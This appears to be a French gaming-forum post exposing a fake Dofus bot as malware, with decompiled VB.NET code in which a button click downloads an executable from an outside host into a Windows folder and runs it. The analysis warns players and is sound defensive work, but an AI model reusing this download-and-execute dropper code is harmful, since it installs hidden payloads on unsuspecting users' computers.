Lisons lisons.
Tiens donc, c'est bizarre, cette description me rappelle quelque chose.
Oh, mais bien sûr, c'était la description qui était sur le site d'Ideo !
Regardons les screens.
Plus aucun doute, c'est bel et bien Ideo, dont le nom a été vulgairement remplacé par retouche d'image !
-> A partir d'ici, en voyant la copie d'Ideo, je sais donc déjà que c'est un fake.
Bon, téléchargeons quand même, pour voir.
Tiens, c'est étrange, ces DLLs et ces dossiers me rappellent quelque chose aussi !
Mais oui bien sur, ce sont les dossiers qui sont présents à côté d'Anic !
A mon avis, il a dû les mettre pour paraître plus réaliste.
-> En voyant les fichiers et les dossiers présents avec Anic, je confirme que c'est un fake.
Bon, essayons de décompiler ça, juste pour voir.
Oh, que vois-je ? Il n'y a absolument RIEN qui a un moindre rapport avec dofus là dedans.
Code:
Private Sub PictureBox2_Click(ByVal sender As Object, ByVal e As EventArgs)
MyProject.Computer.Network.DownloadFile("http://seebot.c.gp/Seebot.exe", "C:\Windows\Seebot.exe")
Process.Start("C:\Windows\Seebot2.exe")
End Sub
-> Nous avons donc la preuve que c'est non seulement un fake, mais qu'en plus il télécharge quelque chose.
Téléchargeons ce second programme pour voir ce que c'est.
Oh, un programme avec l'icone d'autoit, packé avec UPX.
Même pas la peine reverse engineering dessus, balançons ça sur virustotal.
Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
Oh, très peu de détections pour le moment. Dommage que ça risque fort de monter rapidement.
-> C'est donc bien évidemment un fake complet, un virus, ou tout ce que vous voulez.
Dommage, tu étais bien organisé. Tu n'as pas été assez crédible.
---------- Message ajouté à 22h17 ---------- Le message précédent était à 22h16 ----------
Ah, je viens de voir ta mise à jour. Dé-compilons pour voir ce qui change :
Code:
MyProject.Computer.Network.DownloadFile("http://seebot.c.gp/seebot.exe", "C:\Programmes\seebot.exe")
Process.Start("C:\Programmes\seebot.exe")
Dim num As Integer = Me.ProgressBar1.Value
Interaction.MsgBox("Chargement en cour !", MsgBoxStyle.OkOnly, Nothing)
Me.ProgressBar1.Value = (Me.ProgressBar1.Value + 99)
Pas grand chose, visiblement.